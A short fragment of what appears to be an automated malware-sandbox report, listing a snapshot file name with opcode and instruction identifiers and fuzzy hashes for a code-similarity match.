                          • Snapshot File: hcaresult_76_2_7ff7f7900000_lrgkmixyjzta.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                          • Instruction ID: 9818f9520f7ee46933123e9105cd5399884de6284cbdb732cfc1c1fc15afbbd7
                          • Opcode Fuzzy Hash: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                          • Instruction Fuzzy Hash: AFB0922892420A84E304BB21A84126C62706B08B42F800020D42C02392CA6D50424BA0